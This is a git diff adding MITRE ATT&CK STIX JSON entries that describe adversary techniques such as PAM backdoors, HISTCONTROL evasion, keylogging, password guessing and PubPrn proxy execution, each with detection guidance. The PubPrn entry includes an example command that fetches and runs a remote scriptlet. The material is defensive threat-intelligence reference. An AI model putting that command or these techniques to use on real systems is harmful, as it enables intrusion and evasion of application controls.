+ } + ], + "modified": "2021-10-17T14:48:33.580Z", + "name": "Pluggable Authentication Modules", + "description": "Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)\n\nAdversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)\n\nMalicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_detection": "Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nLook for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. 
Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Logon Session: Logon Session Creation", + "File: File Modification" + ], + "x_mitre_permissions_required": [ + "root" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1.json new file mode 100644 index 0000000000000000000000000000000000000000..30664ab7925250feac10eabbdbab6bf348a00784 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1.json 
@@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--c5e0bcef-c92d-41cf-808a-0cadf42ea7d7", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Netskope" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1", + "type": "attack-pattern", + "created": "2020-06-16T18:42:20.734Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1578.004", + "url": "https://attack.mitre.org/techniques/T1578/004" + }, + { + "source_name": "Tech Republic - Restore AWS Snapshots", + "url": "https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/", + "description": "Hardiman, N.. (2012, March 20). Backing up and restoring snapshots on Amazon EC2 machines. Retrieved October 8, 2019." + }, + { + "source_name": "Google - Restore Cloud Snapshot", + "url": "https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots", + "description": "Google. (2019, October 7). Restoring and deleting persistent disk snapshots. Retrieved October 8, 2019." + } + ], + "modified": "2021-03-08T10:33:02.128Z", + "name": "Revert Cloud Instance", + "description": "An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.\n\nAnother variation of this technique is to utilize temporary storage attached to the compute instance. 
Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to snapshots and rollbacks and VM configuration changes, that are occurring outside of normal activity. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Instance: Instance Modification", + "Instance: Instance Stop", + "Instance: Instance Metadata", + "Instance: Instance Start" + ], + "x_mitre_permissions_required": [ + "User" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--086952c4-5b90-4185-b573-02bad8e11953.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--086952c4-5b90-4185-b573-02bad8e11953.json new file mode 100644 index 0000000000000000000000000000000000000000..c5c9554bbb82301d72e16b3868a3088daf4e9402 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--086952c4-5b90-4185-b573-02bad8e11953.json 
@@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--9bc8149b-6780-4f03-9418-6b8f6f9b8c2c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--086952c4-5b90-4185-b573-02bad8e11953", + "type": "attack-pattern", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1148", + "url": "https://attack.mitre.org/techniques/T1148" + }, + { + "external_id": "CAPEC-13", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/13.html" + } + ], + "modified": "2020-02-21T20:57:38.015Z", + "name": "HISTCONTROL", + "description": "The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that \u201c ls\u201d will not be saved, but \u201cls\u201d would be saved by history. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "Correlating a user session with a distinct lack of new commands in their .bash_history can be a clue to suspicious behavior. 
Additionally, users checking or changing their HISTCONTROL environment variable is also suspicious.", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_defense_bypassed": [ + "Log analysis", + "Host forensic analysis" + ], + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f.json new file mode 100644 index 0000000000000000000000000000000000000000..b5260407c2b6baf64aaf449a78ec1ce26d2763e9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f.json 
@@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--4143b7be-4fbe-4191-b288-66050c8f5112", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f", + "type": "attack-pattern", + "created": "2020-10-02T16:39:33.966Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1592", + "url": "https://attack.mitre.org/techniques/T1592" + }, + { + "source_name": "ATT ScanBox", + "url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks", + "description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020." + }, + { + "source_name": "ThreatConnect Infrastructure Dec 2020", + "url": "https://threatconnect.com/blog/infrastructure-research-hunting/", + "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021." + } + ], + "modified": "2021-10-17T16:35:09.878Z", + "name": "Gather Victim Host Information", + "description": "Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). 
Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Internet Scan: Response Content" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0979abf9-4e26-43ec-9b6e-54efc4e70fca.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0979abf9-4e26-43ec-9b6e-54efc4e70fca.json new file mode 100644 index 0000000000000000000000000000000000000000..ea87f998c5d9472ebff71729c98641e4acd068e2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0979abf9-4e26-43ec-9b6e-54efc4e70fca.json 
@@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--edd4433f-4641-4c82-8eac-1cd3135dd554", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0979abf9-4e26-43ec-9b6e-54efc4e70fca", + "type": "attack-pattern", + "created": "2020-10-02T16:58:58.738Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1596.003", + "url": "https://attack.mitre.org/techniques/T1596/003" + }, + { + "source_name": "SSLShopper Lookup", + "url": "https://www.sslshopper.com/ssl-checker.html", + "description": "SSL Shopper. (n.d.). SSL Checker. Retrieved October 20, 2020." + }, + { + "source_name": "Medium SSL Cert", + "url": "https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2", + "description": "Jain, M. (2019, September 16). Export & Download \u2014 SSL Certificate from Server (Site URL). Retrieved October 20, 2020." + } + ], + "modified": "2021-04-15T03:48:37.628Z", + "name": "Digital Certificates", + "description": "Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.\n\nAdversaries may search digital certificate data to gather actionable information. 
Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4.json new file mode 100644 index 0000000000000000000000000000000000000000..85f54be732738575fff4a8efada6393491168a86 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4.json 
@@ -0,0 +1,71 @@ +{ + "type": "bundle", + "id": "bundle--cd54fd9f-ebb0-49ef-b159-43cf2be40d45", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:37.930Z", + "name": "Keylogging", + "description": "Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.\n\nKeylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.\n* Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_detection": "Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`.(Citation: Adventures of a Keystroke) Monitor the Registry and file system for such changes, monitor driver installs, and look for common keylogging API calls. 
API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux", + "Network" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Process: OS API Execution", + "Windows Registry: Windows Registry Key Modification", + "Driver: Driver Load" + ], + "x_mitre_permissions_required": [ + "Administrator", + "root", + "SYSTEM", + "User" + ], + "type": "attack-pattern", + "id": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", + "created": "2020-02-11T18:58:11.791Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1056/001", + "external_id": "T1056.001" + }, + { + "source_name": "Adventures of a Keystroke", + "description": "Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth look into keyloggers on Windows. Retrieved April 27, 2016.", + "url": "http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119.json new file mode 100644 index 0000000000000000000000000000000000000000..b3a23f2c3c14333978e15b80c6d446145965b58c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119.json 
@@ -0,0 +1,77 @@ +{ + "type": "bundle", + "id": "bundle--23c38f6f-0fdf-4270-95db-c6a060338c29", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-14T23:04:08.394Z", + "name": "Password Guessing", + "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.\n\nGuessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)\n\nTypically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n* SNMP (161/UDP and 162/TCP/UDP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018). 
Further, adversaries may abuse network device interfaces (such as `wlanAPI`) to brute force accessible wifi-router(s) via wireless authentication protocols.(Citation: Trend Micro Emotet 2020)\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_contributors": [ + "Microsoft Threat Intelligence Center (MSTIC)", + "Mohamed Kmal" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Linux", + "macOS", + "Google Workspace", + "Containers", + "Network" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "User Account: User Account Authentication" + ], + "type": "attack-pattern", + "id": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", + "created": "2020-02-11T18:38:22.617Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1110/001", + "external_id": "T1110.001" + }, + { + "source_name": "Trend Micro Emotet 2020", + "description": "Cybercrime & Digital Threat Team. (2020, February 13). Emotet Now Spreads via Wi-Fi. 
Retrieved February 16, 2022.", + "url": "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/emotet-now-spreads-via-wi-fi" + }, + { + "source_name": "Cylance Cleaver", + "description": "Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.", + "url": "https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + }, + { + "source_name": "US-CERT TA18-068A 2018", + "description": "US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58.json new file mode 100644 index 0000000000000000000000000000000000000000..7ebfddb4a986d3a3e196b1b5365db410f4a5e8c5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58.json 
@@ -0,0 +1,67 @@ +{ + "type": "bundle", + "id": "bundle--fbc35cd2-96fb-44c7-80c2-b11029290a11", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Atul Nair, Qualys" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58", + "created": "2020-02-03T16:49:57.788Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1216.001", + "url": "https://attack.mitre.org/techniques/T1216/001" + }, + { + "source_name": "pubprn", + "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/pubprn", + "description": "Jason Gerend. (2017, October 16). pubprn. Retrieved July 23, 2021." + }, + { + "source_name": "Enigma0x3 PubPrn Bypass", + "url": "https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/", + "description": "Nelson, M. (2017, August 3). WSH INJECTION: A CASE STUDY. Retrieved April 9, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. 
For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn)\n\nAdversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.\n\nIn later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S).", + "modified": "2022-04-18T14:55:35.817Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "PubPrn", + "x_mitre_detection": "Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_data_sources": [ + "Command: Command Execution", + "Script: Script Execution", + "Process: Process Creation" + ], + "x_mitre_defense_bypassed": [ + "Digital Certificate Validation", + "Application Control" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0a241b6c-7bb2-48f9-98f7-128145b4d27f.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0a241b6c-7bb2-48f9-98f7-128145b4d27f.json new file mode 100644 index 0000000000000000000000000000000000000000..3f0450dff567a758c66ddb4a4e8f2b9f9a7795d9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0a241b6c-7bb2-48f9-98f7-128145b4d27f.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--4688f264-0c16-44af-9cf1-c249885e040c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0a241b6c-7bb2-48f9-98f7-128145b4d27f", + "type": "attack-pattern", + "created": "2020-10-02T17:05:43.562Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1597.002", + "url": "https://attack.mitre.org/techniques/T1597/002" + }, + { + "source_name": "ZDNET Selling Data", + "url": "https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/", + "description": "Cimpanu, C. (2020, May 9). A hacker group is selling more than 73 million user records on the dark web. Retrieved October 20, 2020." + } + ], + "modified": "2021-04-15T03:44:43.900Z", + "name": "Purchase Technical Data", + "description": "Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.\n\nAdversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. 
Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim\u2019s infrastructure.(Citation: ZDNET Selling Data) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22.json 